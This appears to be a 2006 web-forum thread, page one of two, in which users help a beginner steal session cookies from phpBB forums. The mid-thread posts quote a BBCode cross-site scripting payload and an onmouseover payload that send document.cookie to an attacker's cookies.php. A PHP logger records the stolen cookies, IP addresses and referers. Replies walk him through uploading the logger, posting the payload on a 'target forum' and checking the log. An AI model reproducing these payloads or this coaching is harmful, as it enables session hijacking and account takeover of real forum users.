|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
l |
|
Posted: Fri Feb 10, 2006 6:14 pm |
|
|
oobiingzoo |
Beginner |
|
|
Joined: Feb 10, 2006 |
Posts: 4 |
|
|
|
|
|
|
|
|
Last edited by oobiingzoo on Thu Sep 28, 2006 5:28 pm; edited 1 time in total |
|
|
|
Posted: Sat Feb 11, 2006 6:56 am |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Sat Feb 11, 2006 6:10 pm |
|
|
oobiingzoo |
Beginner |
|
|
Joined: Feb 10, 2006 |
Posts: 4 |
|
|
|
|
|
|
|
|
Last edited by oobiingzoo on Thu May 17, 2007 4:33 am; edited 1 time in total |
|
|
|
Posted: Sun Feb 12, 2006 1:04 am |
|
|
is0t0pe |
Regular user |
|
|
Joined: Jan 10, 2006 |
Posts: 13 |
|
|
|
|
|
|
|
I think its against the rules to pay people real money to hack sites... |
|
|
|
|
Posted: Sun Feb 12, 2006 1:52 am |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
thats his problem to make real or fake money for hacking.
point is exploits with greater version number are spread in the wild,tell me why you go for this later version? |
|
|
|
|
Posted: Sun Feb 12, 2006 3:33 am |
|
|
oobiingzoo |
Beginner |
|
|
Joined: Feb 10, 2006 |
Posts: 4 |
|
|
|
|
|
|
|
|
Last edited by oobiingzoo on Thu May 17, 2007 4:34 am; edited 1 time in total |
|
|
|
Posted: Sun Feb 12, 2006 11:53 am |
|
|
syntax9 |
Active user |
|
|
Joined: Dec 21, 2005 |
Posts: 33 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Mon Feb 13, 2006 1:37 pm |
|
|
oobiingzoo |
Beginner |
|
|
Joined: Feb 10, 2006 |
Posts: 4 |
|
|
|
|
|
|
|
|
Last edited by oobiingzoo on Thu May 17, 2007 4:34 am; edited 1 time in total |
|
|
|
Posted: Fri Apr 07, 2006 12:28 pm |
|
|
Bill324 |
Regular user |
|
|
Joined: Apr 07, 2006 |
Posts: 11 |
|
|
|
|
|
|
|
On there it has a script,
Quote: | [url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
cookies.php
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a');
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>
|
How do I use this Do I fill in the gaps with my website or the website im attempting to get. |
|
|
|
|
|
|
|
|
Posted: Fri Apr 07, 2006 2:19 pm |
|
|
Aryan-Husky |
Active user |
|
|
Joined: Apr 03, 2006 |
Posts: 37 |
|
|
|
|
|
|
|
Upload the php as a file called cookies.php to your webserver and then call it in a post on a target forum. Watch the video on kisobox. |
|
|
|
|
Posted: Fri Apr 07, 2006 5:11 pm |
|
|
Bill324 |
Regular user |
|
|
Joined: Apr 07, 2006 |
Posts: 11 |
|
|
|
|
|
|
|
Ok this confuses me, I have viewed the video.
And Have tried to follow as best as I could here is what happens:
1. I copied that script and placed it as cookies.php on the server.
2. Then I attempted to post this in a thread on my forum (Im testing it),
Code: | <pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >
[img]http://www.punchstock.com/image/imagesource/4794232/large/is29020.jpg[/img] |
But, when I do I get just a blank post. All html is enabled and that, I have changed the code:
Code: | http://localhost/cookies.php |
To my new cookies file.
So, basically the post comes up blank, NO IMAGE whatsoever.
Any ideas plz? [/code] |
|
|
|
|
|
|
|
|
Posted: Fri Apr 07, 2006 10:41 pm |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
well it looks like you're doing everything fine.
i would suggest for you to test it online, just go to the target board, and test it by 'preview' post on yourself, and if you get redirected, check your log.txt if the details have been logged. then its all fine! |
|
|
|
|
Posted: Sat Apr 08, 2006 7:05 am |
|
|
Bill324 |
Regular user |
|
|
Joined: Apr 07, 2006 |
Posts: 11 |
|
|
|
|
|
|
|
Where is my log.txt I didnt make one, I just have my cookies.php |
|
|
|
|
Posted: Sun Apr 09, 2006 1:10 am |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
in cookies.php there is this code
Code: | $fp = fopen('log.txt', 'a');
|
so yeah, make a log.txt or any .txt file and change the code |
|
|
|
|
Posted: Sun Apr 09, 2006 7:59 am |
|
|
Bill324 |
Regular user |
|
|
Joined: Apr 07, 2006 |
Posts: 11 |
|
|
|
|
|
|
|
Where shall I put my log. On the server? |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|